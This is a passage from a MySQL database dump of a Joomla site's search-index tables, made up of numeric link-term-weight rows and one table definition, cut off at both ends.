(262, 298328, 0.18669),
(262, 298329, 0.93331),
(262, 298330, 1.02669),
(262, 298331, 0.95669),
(262, 298332, 1.02669),
(263, 299675, 0.42),
(263, 299676, 0.98),
(263, 299677, 1.12),
(263, 299678, 0.91),
(263, 299679, 0.95669),
(263, 299680, 0.98),
(263, 299681, 1.07331),
(263, 299682, 0.93331),
(263, 299683, 1.02669),
(263, 299684, 0.98),
(264, 300828, 0.51331),
(264, 300829, 1.02669),
(264, 300830, 1.14331),
(267, 301202, 1.02669),
(267, 301203, 1.14331),
(267, 301204, 0.91),
(267, 301205, 1.02669),
(267, 301206, 0.91),
(267, 301207, 1.05),
(267, 301208, 0.95669),
(267, 301209, 1.09669),
(267, 301527, 0.86331),
(267, 301528, 0.98),
(268, 302706, 0.98),
(268, 302707, 1.07331),
(269, 303228, 0.98),
(269, 303229, 1.09669),
(269, 303230, 0.93331),
(269, 303231, 1.02669),
(269, 303511, 0.18669),
(269, 303512, 0.88669),
(269, 303513, 0.95669),
(274, 304313, 0.98),
(274, 304314, 1.14331),
(274, 304315, 0.93331),
(274, 304316, 1.14331),
(274, 304317, 0.93331),
(274, 304318, 0.98),
(274, 304319, 0.88669),
(274, 304320, 1.07331),
(274, 304321, 1.00331),
(274, 304322, 1.09669),
(275, 305249, 0.88669),
(275, 305250, 1.02669),
(288, 313598, 0.91),
(288, 313599, 0.98),
(288, 313600, 0.42),
(288, 313601, 0.98),
(288, 313602, 1.07331),
(288, 313603, 1.07331),
(290, 315562, 0.95669),
(290, 315563, 1.02669),
(290, 315564, 1.02669),
(290, 315565, 1.00331),
(290, 315566, 1.19),
(292, 317682, 0.93331),
(292, 317683, 1.09669),
(292, 317684, 0.91),
(292, 317685, 0.98),
(292, 318177, 0.14),
(292, 318178, 0.86331),
(292, 318179, 1.00331),
(294, 318447, 0.42),
(294, 318448, 1.68),
(294, 318449, 0.91),
(294, 318450, 0.91),
(294, 318451, 0.84),
(294, 318452, 0.88669),
(295, 318671, 0.28),
(295, 318672, 1.00331),
(295, 318673, 1.16669),
(295, 318674, 1.00331),
(295, 318675, 1.00331),
(295, 318676, 0.88669),
(295, 318677, 1.09669),
(295, 318678, 0.32669),
(295, 318679, 0.93331),
(295, 318680, 1.00331),
(298, 320227, 0.93331),
(308, 320227, 0.93331),
(298, 320228, 1.09669),
(308, 320228, 1.09669),
(299, 320512, 0.23331),
(299, 320513, 0.88669),
(299, 320514, 0.98),
(299, 320515, 0.07),
(299, 320516, 0.81669),
(299, 320517, 0.95669),
(299, 321060, 1.00331),
(299, 321061, 1.05),
(299, 321062, 0.95669),
(299, 321063, 0.95669),
(299, 321064, 1.05),
(299, 321065, 1.05),
(299, 321066, 0.91),
(299, 321067, 0.98),
(299, 321068, 0.91),
(299, 321069, 0.98),
(299, 321070, 0.93331),
(299, 321071, 1.02669),
(299, 321072, 0.86331),
(299, 321073, 0.98),
(299, 321074, 0.95669),
(299, 321075, 1.05),
(299, 321076, 0.91),
(299, 321077, 0.98),
(299, 321078, 0.95669),
(306, 321078, 0.95669),
(299, 321079, 0.91),
(299, 321080, 1.02669),
(299, 321081, 1.07331),
(299, 321082, 1.14331),
(299, 321083, 0.98),
(299, 321084, 0.28),
(299, 321085, 0.88669),
(299, 321086, 1.00331),
(299, 321087, 0.95669),
(299, 321088, 1.00331),
(299, 321089, 0.91),
(299, 321090, 1.09669),
(299, 321689, 0.86331),
(299, 321690, 0.95669),
(299, 321691, 0.88669),
(299, 321692, 1.00331),
(299, 321693, 0.28),
(299, 321694, 0.95669),
(299, 321695, 1.02669),
(299, 321696, 0.32669),
(299, 321697, 0.93331),
(299, 321698, 1.16669),
(299, 321699, 0.28),
(299, 321700, 0.91),
(299, 321701, 1.00331),
(299, 321702, 0.88669),
(299, 321703, 1.00331),
(299, 321704, 1.00331),
(299, 321705, 1.09669),
(299, 321706, 0.88669),
(299, 321707, 0.93331),
(299, 321708, 0.93331),
(299, 321709, 1.02669),
(304, 325125, 0.93331),
(304, 325126, 1.00331),
(304, 325127, 0.93331),
(304, 325128, 1.02669),
(304, 325129, 0.88669),
(304, 325130, 0.95669),
(304, 325131, 0.98),
(304, 325132, 1.07331),
(304, 325133, 0.88669),
(304, 325134, 0.98),
(305, 326273, 1.09669),
(305, 326274, 1.05),
(305, 326275, 1.00331),
(305, 326276, 0.95669),
(305, 326277, 1.02669),
(305, 326799, 0.88669),
(305, 326800, 1.00331),
(306, 327703, 1.09669),
(306, 327704, 0.95669),
(306, 327705, 1.07331),
(306, 327706, 0.28),
(306, 327707, 1.05),
(306, 327708, 1.12),
(306, 327709, 0.86331),
(306, 327710, 0.98),
(306, 327711, 1.12),
(306, 327712, 1.21331),
(306, 327713, 0.88669),
(306, 327714, 1.16669),
(306, 327715, 1.05),
(306, 327716, 1.05),
(306, 327717, 1.12),
(306, 328576, 0.18669),
(306, 328577, 0.93331),
(306, 328578, 1.02669),
(306, 328579, 0.14),
(306, 328580, 0.91),
(306, 328581, 1.00331);

-- --------------------------------------------------------

--
-- Table structure for table `y57u5_finder_links_terms4`
--

CREATE TABLE `y57u5_finder_links_terms4` (
  `link_id` int(10) UNSIGNED NOT NULL,
  `term_id` int(10) UNSIGNED NOT NULL,
  `weight` float UNSIGNED NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;

--
-- Dumping data for table `y57u5_finder_links_terms4`
--

INSERT INTO `y57u5_finder_links_terms4` (`link_id`, `term_id`, `weight`) VALUES
(159, 96, 0.14),
(160, 96, 0.14),
(236, 96, 0.14),
(244, 96, 0.14),
(256, 96, 0.14),
(258, 96, 0.14),
(261, 96, 0.14),
(269, 96, 0.14),
(273, 96, 0.14),
(275, 96, 0.14),
(295, 96, 0.14),
(298, 96, 0.14),
(308, 96, 0.14),
(31, 96, 0.28),
(238, 96, 0.28),
(243, 96, 0.28),
(246, 96, 0.28),
(250, 96, 0.28),
(251, 96, 0.28),
(252, 96, 0.28),
(254, 96, 0.28),
(257, 96, 0.28),
(263, 96, 0.28),
(264, 96, 0.28),
(268, 96, 0.28),
(272, 96, 0.28),
(280, 96, 0.28),
(292, 96, 0.28),
(305, 96, 0.28),
(306, 96, 0.28),
(168, 96, 0.42),
(237, 96, 0.42),
(239, 96, 0.42),
(267, 96, 0.42),
(299, 96, 0.42),
(304, 96, 0.42),
(178, 96, 0.56),
(193, 96, 0.56),
(241, 96, 0.56),
(262, 96, 0.7),
(240, 96, 0.84),
(174, 96, 1.12),
(31, 97, 0.91),
(159, 97, 0.91),
(160, 97, 0.91),
(250, 97, 0.91),
(251, 97, 0.91),
(31, 98, 1.09669),
(159, 98, 1.09669),
(160, 98, 1.09669),
(250, 98, 1.09669),
(251, 98, 1.09669),
(31, 99, 1.00331),
(250, 99, 1.00331),
(251, 99, 1.00331),
(31, 100, 1.09669),
(250, 100, 1.09669),
(251, 100, 1.09669),
(31, 101, 0.23331),
(159, 101, 0.23331),
(160, 101, 0.23331),
(193, 101, 0.23331),
(239, 101, 0.23331),
(241, 101, 0.23331),
(245, 101, 0.23331),
(250, 101, 0.23331),
(251, 101, 0.23331),
(252, 101, 0.23331),
(262, 101, 0.23331),
(263, 101, 0.23331),
(265, 101, 0.23331),
(266, 101, 0.23331),
(267, 101, 0.23331),
(288, 101, 0.23331),
(298, 101, 0.23331),
(304, 101, 0.23331),
(305, 101, 0.23331),
(308, 101, 0.23331),
(174, 101, 0.46662),
(264, 101, 0.46662),
(242, 101, 0.69993),
(269, 101, 0.69993),
(31, 102, 0.98),
(159, 102, 0.98),
(160, 102, 0.98),
(250, 102, 0.98),
(251, 102, 0.98),
(31, 103, 1.05),
(159, 103, 1.05),
(160, 103, 1.05),
(250, 103, 1.05),
(251, 103, 1.05),
(160, 104, 0.28),
(174, 104, 0.28),
(193, 104, 0.28),
(240, 104, 0.28),
(241, 104, 0.28),
(254, 104, 0.28),
(259, 104, 0.28),
(260, 104, 0.28),
(288, 104, 0.28),
(292, 104, 0.28),
(304, 104, 0.28),
(306, 104, 0.28),
(31, 104, 0.56),
(237, 104, 0.56),
(250, 104, 0.56),
(251, 104, 0.56),
(262, 104, 0.56),
(269, 104, 0.56),
(257, 104, 0.84),
(299, 104, 0.84),
(31, 105, 0.91),
(160, 105, 0.91),
(237, 105, 0.91),
(250, 105, 0.91),
(251, 105, 0.91),
(304, 105, 0.91),
(257, 105, 1.82),
(31, 106, 1.16669),
(160, 106, 1.16669),
(250, 106, 1.16669),
(251, 106, 1.16669),
(31, 107, 1.02669),
(250, 107, 1.02669),
(251, 107, 1.02669),
(31, 108, 1.21331),
(250, 108, 1.21331),
(251, 108, 1.21331),
(168, 114, 0.28),
(240, 114, 0.28),
(242, 114, 0.28),
(245, 114, 0.28),
(249, 114, 0.28),
(261, 114, 0.28),
(298, 114, 0.56),
(308, 114, 0.56),
(244, 114, 0.84),
(31, 114, 1.68),
(159, 114, 1.68),
(160, 114, 1.68),
(250, 114, 1.68),
(251, 114, 1.68),
(31, 115, 0.93331),
(159, 115, 0.93331),
(160, 115, 0.93331),
(250, 115, 0.93331),
(251, 115, 0.93331),
(31, 116, 1.12),
(159, 116, 1.12),
(160, 116, 1.12),
(250, 116, 1.12),
(251, 116, 1.12),
(31, 117, 1.82),
(159, 117, 1.82),
(160, 117, 1.82),
(250, 117, 1.82),
(251, 117, 1.82),
(31, 118, 1.07331),
(159, 118, 1.07331),
(160, 118, 1.07331),
(250, 118, 1.07331),
(251, 118, 1.07331),
(31, 119, 0.98),
(159, 119, 0.98),
(160, 119, 0.98),
(250, 119, 0.98),
(251, 119, 0.98),
(31, 120, 0.95669),
(159, 120, 0.95669),
(160, 120, 0.95669),
(250, 120, 0.95669),
(251, 120, 0.95669),
(31, 121, 1.02669),
(159, 121, 1.02669),
(160, 121, 1.02669),
(250, 121, 1.02669),
(251, 121, 1.02669),
(31, 122, 0.95669),
(159, 122, 0.95669),
(160, 122, 0.95669),
(250, 122, 0.95669),
(251, 122, 0.95669),
(31, 123, 1.05),
(159, 123, 1.05),
(160, 123, 1.05),
(250, 123, 1.05),
(251, 123, 1.05),
(31, 124, 0.95669),
(159, 124, 0.95669),
(160, 124, 0.95669),
(250, 124, 0.95669),
(251, 124, 0.95669),
(261, 124, 0.95669),
(31, 125, 1.16669),
(159, 125, 1.16669),
(160, 125, 1.16669),
(250, 125, 1.16669),
(251, 125, 1.16669),
(31, 126, 0.32669),
(159, 126, 0.32669),
(160, 126, 0.32669),
(237, 126, 0.32669),
(250, 126, 0.32669),
(251, 126, 0.32669),
(288, 126, 0.32669),
(298, 126, 0.32669),
(308, 126, 0.32669),
(306, 126, 0.65338),
(31, 127, 0.98),
(159, 127, 0.98),
(160, 127, 0.98),
(250, 127, 0.98),
(251, 127, 0.98),
(31, 128, 1.07331),
(159, 128, 1.07331),
(160, 128, 1.07331),
(250, 128, 1.07331),
(251, 128, 1.07331),
(31, 129, 0.18669),
(159, 129, 0.18669),
(160, 129, 0.18669),
(235, 129, 0.18669),
(237, 129, 0.18669),
(238, 129, 0.18669),
(239, 129, 0.18669),
(243, 129, 0.18669),
(247, 129, 0.18669),
(250, 129, 0.18669),
(251, 129, 0.18669),
(254, 129, 0.18669),
(255, 129, 0.18669),
(267, 129, 0.18669),
(270, 129, 0.18669),
(272, 129, 0.18669),
(273, 129, 0.18669),
(280, 129, 0.18669),
(288, 129, 0.18669),
(295, 129, 0.18669),
(298, 129, 0.18669),
(301, 129, 0.18669),
(304, 129, 0.18669),
(308, 129, 0.18669),
(233, 129, 0.37338),
(275, 129, 0.37338),
(290, 129, 0.37338),
(292, 129, 0.37338),
(306, 129, 0.37338),
(178, 129, 0.56007),
(241, 129, 0.56007),
(264, 129, 0.56007),
(305, 129, 0.56007),
(244, 129, 0.74676),
(299, 129, 0.74676),
(31, 130, 0.86331),
(159, 130, 0.86331),
(160, 130, 0.86331),
(250, 130, 0.86331),
(251, 130, 0.86331),
(31, 131, 0.93331),
(159, 131, 0.93331),
(160, 131, 0.93331),
(250, 131, 0.93331),
(251, 131, 0.93331),
(31, 135, 0.46669),
(160, 135, 0.46669),
(242, 135, 0.46669),
(250, 135, 0.46669),
(251, 135, 0.46669),
(305, 135, 0.46669),
(239, 135, 0.93338),
(265, 135, 3.73352),
(266, 135, 3.73352),
(31, 136, 1.00331),
(160, 136, 1.00331),
(239, 136, 1.00331),
(250, 136, 1.00331),
(251, 136, 1.00331),
(305, 136, 1.00331),
(265, 136, 5.01655),
(266, 136, 5.01655),
(31, 137, 1.12),
(160, 137, 1.12),
(250, 137, 1.12),
(251, 137, 1.12),
(31, 140, 0.14),
(250, 140, 0.14),
(251, 140, 0.14),
(31, 141, 0.91),
(250, 141, 0.91),
(251, 141, 0.91),
(31, 142, 1.00331),
(250, 142, 1.00331),
(251, 142, 1.00331),
(31, 426, 0.46669),
(160, 426, 0.46669),
(250, 426, 0.46669),
(251, 426, 0.46669),
(31, 427, 1.19),
(160, 427, 1.19),
(250, 427, 1.19),
(251, 427, 1.19),
(31, 428, 1.26),
(160, 428, 1.26),
(250, 428, 1.26),
(251, 428, 1.26),
(295, 581, 0.035),
(161, 581, 0.14),
(178, 581, 0.14),
(298, 581, 0.1575),
(301, 581, 0.245),
(304, 581, 0.3325),
(299, 581, 0.455),
(305, 581, 0.455),
(159, 581, 0.56),
(245, 581, 0.56),
(31, 581, 0.7),
(160, 581, 0.7),
(250, 581, 0.7),
(258, 581, 0.7),
(290, 581, 0.7),
(236, 581, 0.76),
(248, 581, 0.84),
(168, 581, 0.98),
(235, 581, 0.98),
(249, 581, 0.98),
(246, 581, 1.12),
(265, 581, 1.26),
(266, 581, 1.26),
(274, 581, 1.26),
(308, 581, 1.26),
(233, 581, 1.4),
(255, 581, 1.4),
(247, 581, 1.54),
(264, 581, 1.54),
(244, 581, 1.68),
(251, 581, 1.84),
(238, 581, 1.96),
(270, 581, 1.96),
(256, 581, 2.1),
(262, 581, 2.24),
(263, 581, 2.24),
(267, 581, 2.24),
(253, 581, 2.26),
(273, 581, 2.3),
(272, 581, 2.38),
(280, 581, 2.38),
(288, 581, 2.66),
(243, 581, 2.8),
(257, 581, 2.94),
(269, 581, 2.94),
(174, 581, 3.08),
(254, 581, 3.22),
(259, 581, 3.22),
(260, 581, 3.22),
(237, 581, 3.36),
(239, 581, 3.36),
(275, 581, 3.54),
(268, 581, 3.92),
(252, 581, 4.2),
(261, 581, 4.34),
(292, 581, 4.36),
(241, 581, 4.48),
(240, 581, 5.46),
(193, 581, 5.74),
(242, 581, 6.72),
(306, 581, 6.86),
(31, 582, 0.81669),
(159, 582, 0.81669),
(160, 582, 0.81669),
(238, 582, 0.81669),
(240, 582, 0.81669),
(243, 582, 0.81669),
(250, 582, 0.81669),
(251, 582, 0.81669),
(267, 582, 0.81669),
(274, 582, 0.81669),
(306, 582, 0.81669),
(193, 582, 1.63338),
(31, 583, 0.98),
(159, 583, 0.98),
(160, 583, 0.98),
(250, 583, 0.98),
(251, 583, 0.98),
(31, 584, 0.91),
(159, 584, 0.91),
(160, 584, 0.91),
(193, 584, 0.91),
(250, 584, 0.91),
(251, 584, 0.91),
(252, 584, 0.91),
(262, 584, 0.91),
(265, 584, 0.91),
(266, 584, 0.91),
(267, 584, 0.91),
(304, 584, 0.91),
(174, 584, 1.82),
(264, 584, 1.82),
(242, 584, 2.73),
(269, 584, 2.73),
(31, 585, 1.07331),
(159, 585, 1.07331),
(160, 585, 1.07331),
(250, 585, 1.07331),
(251, 585, 1.07331),
(31, 586, 0.93331),
(160, 586, 0.93331),
(174, 586, 0.93331),
(193, 586, 0.93331),
(237, 586, 0.93331),
(241, 586, 0.93331),
(250, 586, 0.93331),
(251, 586, 0.93331),
(259, 586, 0.93331),
(260, 586, 0.93331),
(262, 586, 0.93331),
(288, 586, 0.93331),
(299, 586, 0.93331),
(304, 586, 0.93331),
(306, 586, 0.93331),
(257, 586, 2.79993),
(31, 587, 1.00331),
(160, 587, 1.00331),
(237, 587, 1.00331),
(250, 587, 1.00331),
(251, 587, 1.00331),
(304, 587, 1.00331),
(257, 587, 2.00662),
(31, 588, 0.91),
(159, 588, 0.91),
(160, 588, 0.91),
(174, 588, 0.91),
(235, 588, 0.91),
(239, 588, 0.91),
(241, 588, 0.91),
(242, 588, 0.91),
(250, 588, 0.91),
(251, 588, 0.91),
(253, 588, 0.91),
(259, 588, 0.91),
(260, 588, 0.91),
(269, 588, 0.91),
(272, 588, 0.91),
(273, 588, 0.91),
(280, 588, 0.91),
(299, 588, 0.91),
(240, 588, 1.82),
(306, 588, 1.82),
(31, 589, 1.02669),
(159, 589, 1.02669),
(160, 589, 1.02669),
(250, 589, 1.02669),
(251, 589, 1.02669),
(31, 590, 0.95669),
(159, 590, 0.95669),
(160, 590, 0.95669),
(250, 590, 0.95669),
(251, 590, 0.95669),
(31, 591, 1.02669),
(159, 591, 1.02669),
(160, 591, 1.02669),
(250, 591, 1.02669),
(251, 591, 1.02669),
(295, 592, 0.02331),
(161, 592, 0.18669),
(178, 592, 0.18669),
(235, 592, 0.18669),
(305, 592, 0.2331),
(299, 592, 0.25641),
(304, 592, 0.27972),
(298, 592, 0.31302),
(301, 592, 0.37296),
(233, 592, 0.37338),
(249, 592, 0.37338),
(287, 592, 0.37338),
(236, 592, 0.74676),
(248, 592, 0.74676),
(252, 592, 0.74676),
(31, 592, 0.93345),
(244, 592, 0.93345),
(250, 592, 0.93345),
(251, 592, 0.93345),
(275, 592, 0.93345),
(290, 592, 0.93345),
(292, 592, 0.93345),
(160, 592, 1.12014),
(238, 592, 1.12014),
(264, 592, 1.12014),
(273, 592, 1.20015),
(237, 592, 1.30683),
(239, 592, 1.30683),
(247, 592, 1.30683),
(243, 592, 1.49352),
(246, 592, 1.49352),
(258, 592, 1.49352),
(263, 592, 1.49352),
(269, 592, 1.49352),
(254, 592, 1.68021),
(288, 592, 1.76022),
(267, 592, 2.05359),
(268, 592, 2.05359),
(241, 592, 2.24028),
(255, 592, 2.24028),
(257, 592, 2.24028),
(159, 592, 2.26695),
(274, 592, 2.26695),
(168, 592, 2.32029),
(308, 592, 2.50698),
(256, 592, 2.61366),
(272, 592, 2.80035),
(280, 592, 2.80035),
(270, 592, 2.98704),
(265, 592, 3.17373),
(266, 592, 3.17373),
(261, 592, 3.7338),
(253, 592, 3.92049),
(259, 592, 4.29387),
(240, 592, 4.48056),
(260, 592, 4.48056),
(174, 592, 4.85394),
(242, 592, 4.85394),
(306, 592, 5.41401),
(193, 592, 8.02767),
(262, 592, 8.21436),
(31, 593, 1.02669),
(160, 593, 1.02669),
(250, 593, 1.02669),
(251, 593, 1.02669),
(31, 594, 1.21331),
(160, 594, 1.21331),
(250, 594, 1.21331),
(251, 594, 1.21331),
(31, 595, 1.00331),
(159, 595, 1.00331),
(160, 595, 1.00331),
(247, 595, 1.00331),
(250, 595, 1.00331),
(251, 595, 1.00331),
(31, 596, 1.16669),
(159, 596, 1.16669),
(160, 596, 1.16669),
(250, 596, 1.16669),
(251, 596, 1.16669),
(31, 597, 0.91),
(159, 597, 0.91),
(160, 597, 0.91),
(250, 597, 0.91),
(251, 597, 0.91),
(272, 597, 0.91),
(280, 597, 0.91),
(298, 597, 0.91),
(308, 597, 0.91),
(268, 597, 1.82),
(262, 597, 2.73),
(31, 598, 0.98),
(159, 598, 0.98),
(160, 598, 0.98),
(250, 598, 0.98),
(251, 598, 0.98),
(31, 599, 0.91),
(174, 599, 0.91),
(236, 599, 0.91),
(240, 599, 0.91),
(248, 599, 0.91),
(250, 599, 0.91),
(251, 599, 0.91),
(254, 599, 0.91),
(261, 599, 0.91),
(264, 599, 0.91),
(268, 599, 0.91),
(273, 599, 0.91),
(275, 599, 0.91),
(304, 599, 0.91),
(160, 599, 1.82),
(193, 599, 1.82),
(243, 599, 1.82),
(246, 599, 1.82),
(265, 599, 1.82),
(266, 599, 1.82),
(274, 599, 1.82),
(288, 599, 1.82),
(305, 599, 1.82),
(306, 599, 1.82),
(237, 599, 2.73),
(269, 599, 2.73),
(256, 599, 3.64),
(257, 599, 3.64),
(263, 599, 3.64),
(259, 599, 5.46),
(260, 599, 5.46),
(242, 599, 6.37),
(262, 599, 6.37),
(272, 599, 6.37),
(280, 599, 6.37),
(270, 599, 7.28),
(301, 599, 7.28),
(159, 599, 9.23),
(31, 600, 1.05),
(159, 600, 1.05),
(160, 600, 1.05),
(250, 600, 1.05),
(251, 600, 1.05),
(31, 601, 0.88669),
(160, 601, 0.88669),
(174, 601, 0.88669),
(193, 601, 0.88669),
(233, 601, 0.88669),
(241, 601, 0.88669),
(250, 601, 0.88669),
(251, 601, 0.88669),
(256, 601, 0.88669),
(269, 601, 0.88669),
(246, 601, 1.77338),
(253, 601, 1.77338),
(290, 601, 1.77338),
(31, 602, 1.05),
(160, 602, 1.05),
(250, 602, 1.05),
(251, 602, 1.05),
(31, 603, 0.37331),
(233, 603, 0.37331),
(235, 603, 0.37331),
(239, 603, 0.37331),
(243, 603, 0.37331),
(246, 603, 0.37331),
(250, 603, 0.37331),
(251, 603, 0.37331),
(253, 603, 0.37331),
(257, 603, 0.37331),
(261, 603, 0.37331),
(267, 603, 0.37331),
(268, 603, 0.37331),
(273, 603, 0.37331),
(275, 603, 0.37331),
(292, 603, 0.37331),
(304, 603, 0.37331),
(159, 603, 0.74662),
(168, 603, 0.74662),
(237, 603, 0.74662),
(238, 603, 0.74662),
(248, 603, 0.74662),
(263, 603, 0.74662),
(306, 603, 0.74662),
(160, 603, 1.11993),
(265, 603, 1.11993),
(266, 603, 1.11993),
(193, 603, 1.49324),
(247, 603, 1.49324),
(242, 603, 1.86655),
(240, 603, 2.23986),
(31, 604, 1.00331),
(160, 604, 1.00331),
(250, 604, 1.00331),
(251, 604, 1.00331),
(31, 605, 1.14331),
(160, 605, 1.14331),
(250, 605, 1.14331),
(251, 605, 1.14331),
(159, 1049, 0.51331),
(160, 1049, 0.51331),
(159, 1050, 1.05),
(160, 1050, 1.05),
(159, 1051, 1.16669),
(160, 1051, 1.16669),
(159, 1137, 1.07331),
(160, 1137, 1.07331),
(257, 1137, 1.07331),
(159, 1138, 1.02669),
(160, 1138, 1.02669),
(159, 1139, 1.09669),
(160, 1139, 1.09669),
(159, 1140, 0.95669),
(160, 1140, 0.95669),
(168, 1140, 0.95669),
(233, 1140, 0.95669),
(239, 1140, 0.95669),
(253, 1140, 0.95669),
(261, 1140, 0.95669),
(263, 1140, 0.95669),
(275, 1140, 0.95669),
(159, 1141, 1.02669),
(160, 1141, 1.02669),
(253, 1141, 1.02669),
(242, 1292, 0.23331),
(247, 1292, 0.23331),
(261, 1292, 0.23331),
(161, 1292, 0.46662),
(161, 1293, 0.91),
(242, 1293, 0.91),
(161, 1322, 0.32669),
(298, 1322, 0.32669),
(304, 1322, 0.32669),
(308, 1322, 0.32669),
(233, 1328, 0.18669),
(161, 1328, 0.45339),
(233, 1329, 0.86331),
(161, 1329, 2.09661),
(161, 1334, 0.23331),
(244, 1334, 0.23331),
(274, 1334, 0.23331),
(299, 1334, 0.23331),
(304, 1334, 0.23331),
(306, 1334, 0.23331),
(161, 1634, 0.32669),
(240, 1634, 0.32669),
(237, 1637, 0.74662),
(161, 1637, 3.03981),
(161, 1641, 0.32669),
(174, 1641, 0.32669),
(245, 1641, 0.32669),
(238, 1641, 1.96014),
(161, 1808, 0.84),
(168, 1808, 0.84),
(235, 1808, 0.84),
(237, 1808, 0.84),
(243, 1808, 0.84),
(246, 1808, 0.84),
(254, 1808, 0.84),
(255, 1808, 0.84),
(258, 1808, 0.84),
(262, 1808, 0.84),
(267, 1808, 0.84),
(268, 1808, 0.84),
(269, 1808, 0.84),
(274, 1808, 0.84),
(239, 1808, 1.68),
(240, 1808, 1.68),
(241, 1808, 1.68),
(242, 1808, 1.68),
(253, 1808, 1.68),
(261, 1808, 1.68),
(305, 1808, 1.68),
(247, 1808, 2.52),
(264, 1808, 2.52),
(292, 1808, 2.52),
(304, 1808, 2.52),
(306, 1808, 2.52),
(273, 1808, 4.56),
(193, 1808, 5.04),
(252, 1808, 5.04),
(235, 2544, 0.14),
(241, 2544, 0.14),
(255, 2544, 0.14),
(257, 2544, 0.14),
(258, 2544, 0.14),
(259, 2544, 0.14),
(260, 2544, 0.14),
(261, 2544, 0.14),
(263, 2544, 0.14),
(264, 2544, 0.14),
(295, 2544, 0.14),
(304, 2544, 0.14),
(305, 2544, 0.14),
(31, 2544, 0.48),
(159, 2544, 0.48),
(160, 2544, 0.48),
(168, 2544, 0.48),
(174, 2544, 0.48),
(178, 2544, 0.48),
(250, 2544, 0.48),
(251, 2544, 0.48),
(252, 2544, 0.48),
(256, 2544, 0.48),
(265, 2544, 0.48),
(266, 2544, 0.48),
(267, 2544, 0.48),
(290, 2544, 0.48),
(294, 2544, 0.48),
(299, 2544, 0.48),
(237, 2544, 0.62),
(253, 2544, 0.62),
(254, 2544, 0.62),
(269, 2544, 0.62),
(270, 2544, 0.62),
(272, 2544, 0.62),
(273, 2544, 0.62),
(274, 2544, 0.62),
(275, 2544, 0.62),
(280, 2544, 0.62),
(288, 2544, 0.62),
(292, 2544, 0.62),
(301, 2544, 0.62),
(236, 2544, 0.7),
(243, 2544, 0.7),
(268, 2544, 0.76),
(241, 2545, 0.95669),
(255, 2545, 0.95669),
(257, 2545, 0.95669),
(258, 2545, 0.95669),
(259, 2545, 0.95669),
(260, 2545, 0.95669),
(261, 2545, 0.95669),
(263, 2545, 0.95669),
(264, 2545, 0.95669),
(304, 2545, 0.95669),
(305, 2545, 0.95669),
(31, 2545, 3.28008),
(159, 2545, 3.28008),
(160, 2545, 3.28008),
(174, 2545, 3.28008),
(250, 2545, 3.28008),
(251, 2545, 3.28008),
(252, 2545, 3.28008),
(256, 2545, 3.28008),
(265, 2545, 3.28008),
(266, 2545, 3.28008),
(267, 2545, 3.28008),
(274, 2545, 3.28008),
(275, 2545, 3.28008),
(280, 2545, 3.28008),
(290, 2545, 3.28008),
(299, 2545, 3.28008),
(237, 2545, 4.23677),
(253, 2545, 4.23677),
(254, 2545, 4.23677),
(268, 2545, 4.23677),
(269, 2545, 4.23677),
(270, 2545, 4.23677),
(272, 2545, 4.23677),
(273, 2545, 4.23677),
(288, 2545, 4.23677),
(292, 2545, 4.23677),
(301, 2545, 4.23677),
(31, 2546, 3.91992),
(159, 2546, 3.91992),
(160, 2546, 3.91992),
(174, 2546, 3.91992),
(237, 2546, 3.91992),
(250, 2546, 3.91992),
(251, 2546, 3.91992),
(252, 2546, 3.91992),
(253, 2546, 3.91992),
(254, 2546, 3.91992),
(256, 2546, 3.91992),
(265, 2546, 3.91992),
(266, 2546, 3.91992),
(267, 2546, 3.91992),
(268, 2546, 3.91992),
(269, 2546, 3.91992),
(270, 2546, 3.91992),
(272, 2546, 3.91992),
(273, 2546, 3.91992),
(274, 2546, 3.91992),
(275, 2546, 3.91992),
(280, 2546, 3.91992),
(288, 2546, 3.91992),
(290, 2546, 3.91992),
(292, 2546, 3.91992),
(299, 2546, 3.91992),
(301, 2546, 3.91992),
(254, 10487, 0.88669),
(251, 10487, 7.22019),
(174, 11544, 0.23331),
(178, 11544, 0.23331),
(239, 11544, 0.23331),
(249, 11544, 0.23331),
(257, 11544, 0.23331),
(261, 11544, 0.23331),
(267, 11544, 0.23331),
(268, 11544, 0.23331),
(272, 11544, 0.23331),
(274, 11544, 0.23331),
(275, 11544, 0.23331),
(280, 11544, 0.23331),
(288, 11544, 0.23331),
(299, 11544, 0.23331),
(306, 11544, 0.23331),
(242, 11544, 0.46662),
(254, 11544, 0.46662),
(258, 11544, 0.69993),
(31, 11544, 1.89981),
(31, 11545, 7.59981),
(31, 11546, 8.93019),
(31, 11547, 1.92),
(31, 11548, 5.12),
(31, 11549, 3.5334),
(193, 12731, 0.32669),
(252, 12731, 0.32669),
(273, 12731, 0.32669),
(308, 12731, 0.32669),
(305, 12731, 0.65338),
(49, 12731, 0.79339),
(270, 12731, 1.30676),
(301, 12731, 1.30676),
(306, 12731, 1.63345),
(269, 12731, 1.96014),
(193, 12732, 0.95669),
(252, 12732, 0.95669),
(252, 12736, 0.93331),
(262, 12736, 0.93331),
(252, 12740, 0.23331),
(178, 12740, 0.46662),
(237, 12743, 0.23331),
(238, 12743, 0.23331),
(242, 12743, 0.23331),
(252, 12743, 0.23331),
(263, 12743, 0.23331),
(306, 12743, 0.46662),
(178, 12743, 0.93324),
(174, 12743, 1.16655),
(178, 12744, 0.88669),
(237, 12744, 0.88669),
(242, 12744, 0.88669),
(252, 12744, 0.88669),
(263, 12744, 0.88669),
(306, 12744, 1.77338),
(237, 12745, 0.98),
(242, 12745, 0.98),
(252, 12745, 0.98),
(263, 12745, 0.98),
(306, 12745, 1.96),
(44, 12746, 1.2),
(45, 12746, 1.2),
(46, 12746, 1.2),
(47, 12746, 1.2),
(48, 12746, 1.2),
(49, 12746, 1.2),
(50, 12746, 1.2),
(159, 12746, 1.2),
(160, 12746, 1.2),
(161, 12746, 1.2),
(168, 12746, 1.2),
(174, 12746, 1.2),
(178, 12746, 1.2),
(193, 12746, 1.2),
(233, 12746, 1.2),
(235, 12746, 1.2),
(236, 12746, 1.2),
(237, 12746, 1.2),
(238, 12746, 1.2),
(239, 12746, 1.2),
(240, 12746, 1.2),
(241, 12746, 1.2),
(242, 12746, 1.2),
(243, 12746, 1.2),
(244, 12746, 1.2),
(245, 12746, 1.2),
(246, 12746, 1.2),
(247, 12746, 1.2),
(248, 12746, 1.2),
(249, 12746, 1.2),
(250, 12746, 1.2),
(251, 12746, 1.2),
(252, 12746, 1.2),
(253, 12746, 1.2),
(254, 12746, 1.2),
(255, 12746, 1.2),
(256, 12746, 1.2),
(257, 12746, 1.2),
(258, 12746, 1.2),
(259, 12746, 1.2),
(260, 12746, 1.2),
